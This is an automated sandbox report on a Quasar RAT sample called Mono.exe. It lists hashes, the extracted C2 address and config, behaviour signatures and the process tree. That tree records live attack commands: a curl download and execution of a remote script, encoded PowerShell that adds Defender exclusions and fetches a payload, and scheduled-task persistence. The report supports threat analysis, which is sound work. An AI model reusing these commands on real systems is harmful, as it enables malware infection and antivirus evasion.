Overview

overview

10

Static

static

3

Mono.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    179s
  • max time network
    186s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241023-en
  • resource tags

    arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    30-12-2024 03:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Mono.exe

  • Size

    14KB

  • MD5

    db7b0a5a3a54e83200368927b5f3a007

  • SHA1

    5cb156def2a964f7551a6036ec7af1d8afea4cb2

  • SHA256

    4902cfc6d7899675fad895da3fdc49f383c5ce0b126986a20c2b29e1382fc1ed

  • SHA512

    79636f827d951ee566ffccd79372a18ee07ba178e54c0421211b54a1ea33c9fc7e5522093bd4abf1a9794a7a0ab9dd7bd3913aec995b819ab588e26373e39009

  • SSDEEP

    384:iYAlQqV70tSM1z5zj7Ez48jQKira3lyjcoEwjZ2V8E+d4fjxAd:UMkzDHlmQKn/d

Score
10/10
quasar28discoveryexecutionspywaretrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://captcha.cam/file.b64

Extracted

Family

quasar

Version

1.4.1

Botnet

28

C2

194.26.192.167:2768

Mutex

859d5f90-e2d0-4b2d-ba9f-5371df032ec2

Attributes
  • encryption_key

    BE2B0B270E4DB19CAA5C42E9D2EBF64645A2D055

  • install_name

    RuntimeBroker.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    RuntimeBroker

  • subdirectory

    RuntimeBroker

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Executes dropped EXE 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 40 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Mono.exe
    "C:\Users\Admin\AppData\Local\Temp\Mono.exe"
    1⤵
      PID:3144
    • C:\Windows\system32\control.exe
      "C:\Windows\system32\control.exe" /name Microsoft.AdministrativeTools
      1⤵
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      PID:3524
    • C:\Windows\SysWOW64\DllHost.exe
      C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
      1⤵
      • System Location Discovery: System Language Discovery
      PID:4300
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:3464
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2712
        • C:\Windows\system32\cmd.exe
          cmd /c "curl -k -L -Ss https://captcha.cam/t.cmd -o "C:\Users\Admin\AppData\Local\Temp\1.cmd" && "C:\Users\Admin\AppData\Local\Temp\1.cmd"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4824
          • C:\Windows\system32\curl.exe
            curl -k -L -Ss https://captcha.cam/t.cmd -o "C:\Users\Admin\AppData\Local\Temp\1.cmd"
            4⤵
              PID:4788
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -w h -command ""
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2572
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\Admin\AppData\Local\Temp\1.cmd' -ArgumentList 'am_admin'"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3700
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1.cmd" am_admin
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4956
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -w h -command ""
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2056
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4060
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4156
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:5012
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
                    7⤵
                      PID:2552
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGMAYQBwAHQAYwBoAGEALgBjAGEAbQAvAGYAaQBsAGUALgBiADYANAAiADsAJABiADYANABGAGkAbABlAD0AIgAkAGUAbgB2ADoAVABlAG0AcABcAGYAaQBsAGUALgBiADYANAAiADsAJABlAHgAZQBGAGkAbABlAD0AIgAkAGUAbgB2ADoAVABlAG0AcABcAFIAdQBuAHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGIANgA0AEYAaQBsAGUAOwBbAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAZQB4AGUARgBpAGwAZQAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGIANgA0AEYAaQBsAGUAIAAtAFIAYQB3ACkAKQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQB4AGUARgBpAGwAZQA=
                    6⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4076
                    • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
                      "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4372
                      • C:\Windows\SYSTEM32\schtasks.exe
                        "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe" /rl HIGHEST /f
                        8⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:3992
                      • C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe
                        "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:4108
                        • C:\Windows\SYSTEM32\schtasks.exe
                          "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe" /rl HIGHEST /f
                          9⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:4832
        • C:\Windows\system32\BackgroundTransferHost.exe
          "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
          1⤵
          • Modifies registry class
          PID:2360
        • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
          "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
          1⤵
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:2528

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log
          Filesize

          1KB

          MD5

          b4e91d2e5f40d5e2586a86cf3bb4df24

          SHA1

          31920b3a41aa4400d4a0230a7622848789b38672

          SHA256

          5d8af3c7519874ed42a0d74ee559ae30d9cc6930aef213079347e2b47092c210

          SHA512

          968751b79a98961f145de48d425ea820fd1875bae79a725adf35fc8f4706c103ee0c7babd4838166d8a0dda9fbce3728c0265a04c4b37f335ec4eaa110a2b319

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          627073ee3ca9676911bee35548eff2b8

          SHA1

          4c4b68c65e2cab9864b51167d710aa29ebdcff2e

          SHA256

          85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

          SHA512

          3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
          Filesize

          14KB

          MD5

          b7550edd657eed14cec6524f16e2919b

          SHA1

          cfb6b52663ceefbd923c8944b70f9ce0f147dfdb

          SHA256

          cc11e8c0a2eedb97b59955aed8a9e77f8028207574bdc5a4ccd6332a8b4834b7

          SHA512

          9968ab16da1ad694bc0f5b835fdff7915a54c7e38152a080cf4ca1c6f8f1958e8f5e4e5731eb47c6d66bebbd674ece0240e3ab45e4f32c7171a113dbc48ce7af

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          d8b9a260789a22d72263ef3bb119108c

          SHA1

          376a9bd48726f422679f2cd65003442c0b6f6dd5

          SHA256

          d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

          SHA512

          550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          64B

          MD5

          446dd1cf97eaba21cf14d03aebc79f27

          SHA1

          36e4cc7367e0c7b40f4a8ace272941ea46373799

          SHA256

          a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

          SHA512

          a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

          Download Submit

        • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\18fe1e26-1159-4117-a6e2-40f3c269c3d6.down_data
          Filesize

          555KB

          MD5

          5683c0028832cae4ef93ca39c8ac5029

          SHA1

          248755e4e1db552e0b6f8651b04ca6d1b31a86fb

          SHA256

          855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

          SHA512

          aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

          Download Submit

        • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
          Filesize

          10KB

          MD5

          1301a13a0b62ba61652cdbf2d61f80fa

          SHA1

          1911d1f0d097e8f5275a29e17b0bcef305df1d9e

          SHA256

          7e75ad955706d05f5934810aebbd3b5a7742d5e5766efd9c4fc17ee492b2f716

          SHA512

          66aa4261628bb31ee416af70f4159c02e5bbfbe2f7645e87d70bb35b1f20fa915d62b25d99cd72c59580d1f64e6c6b5ad36ace6600d3bcdb67f45036d768ed8b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\1.cmd
          Filesize

          1KB

          MD5

          104cc53cf2a78348c132b27766627399

          SHA1

          6c1c7eff5c6f5520473f8c861c9408b0cd07d7cf

          SHA256

          995acc6b43d40f9f8236dfc7b581a8afa2f06c538222d329fef9e6f0b6f4bd18

          SHA512

          290406d75bdec56531723c245fe55f632415abd4022fb9aebd6a332d0eb33cbd9dec241076534a2265eeacc617afa058cc5c9b170859dc3263042af1e30d1e0b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
          Filesize

          3.1MB

          MD5

          b94af11cca65c557d23559e978a49d18

          SHA1

          0c3436d0c5df8e2e39bf4869bbe4413ca8d594b7

          SHA256

          f6a0a782d574de811fe66ecf6416c69b486f9ca20faf96cfc863a00063306338

          SHA512

          c1254360b2382957f043b8edcf36b28f13a93d0860dc9609d9b46eded81bc004e4149113e9eaad8b4d2cc18164942588bd4e97ecd8fce4f9afd8e537bc668b16

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nkbzs2ns.enk.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/2572-34-0x000001D078BD0000-0x000001D078BF2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3144-3-0x00007FF834CF0000-0x00007FF8357B2000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3144-2-0x00007FF834CF0000-0x00007FF8357B2000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/3144-1-0x00000245B9270000-0x00000245B9278000-memory.dmp

          Filesize

          32KB

          Download

        • memory/3144-0-0x00007FF834CF3000-0x00007FF834CF5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/4108-127-0x000000001CBD0000-0x000000001CC0C000-memory.dmp

          Filesize

          240KB

          Download

        • memory/4108-124-0x000000001CB00000-0x000000001CB50000-memory.dmp

          Filesize

          320KB

          Download

        • memory/4108-125-0x000000001CC10000-0x000000001CCC2000-memory.dmp

          Filesize

          712KB

          Download

        • memory/4108-126-0x000000001CB70000-0x000000001CB82000-memory.dmp

          Filesize

          72KB

          Download

        • memory/4372-116-0x0000000000110000-0x0000000000434000-memory.dmp

          Filesize

          3.1MB

          Download